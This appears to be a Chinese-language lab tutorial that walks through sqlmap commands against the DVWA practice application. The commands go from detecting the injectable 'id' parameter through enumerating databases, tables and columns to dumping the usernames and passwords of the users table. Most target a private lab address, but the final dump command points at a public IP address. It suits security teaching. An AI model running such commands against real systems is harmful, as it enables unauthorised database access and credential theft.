--batch:扫描过程中选择默认选项 -u:指定扫描的url
sqlmap -u "http://192.168.80.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5veto8bjnobhv4uird06sgeksr" --batch返回结果: 可注入的参数名称,注入类型,已经DBMS类型。
--current-user:当前正在执行相关数据库查询操作的 DBMS 用户 --current-db:当前web应用连接到的数据库名称
sqlmap -u "http://192.168.80.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5veto8bjnobhv4uird06sgeksr" --current-db --current-user --batch返回结果: 当前连接的数据库名,查询的用户名。 --is-dba:检验当前用户是不是数据库管理员
sqlmap -u "http://192.168.80.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5veto8bjnobhv4uird06sgeksr" --is-dba --batch返回结果: --dbs:如果当前会话用户对包含 DBMS 可用数据库信息的系统表有读取权限,则可以枚举出当前数据库列表。
sqlmap -u "http://192.168.80.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5veto8bjnobhv4uird06sgeksr" --dbs --batch--tables -D:-D指定数据库,列出数据库中所有的表
sqlmap -u "http://192.168.80.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5veto8bjnobhv4uird06sgeksr" --tables -D 'dvwa' --batch--columns -T -D:指定数据库名,表名,列出所有的列名。
sqlmap -u "http://192.168.80.1/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5veto8bjnobhv4uird06sgeksr" --columns -T users -D 'dvwa' --batch--dump + 列名 -T指定表明 -D指定数据库名
sqlmap -u "http://43.247.91.228:81/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=e1c16bc8vvktf5qjoc4csa7hm4; security=low" --dump user,password -T users -D dvwa --batch
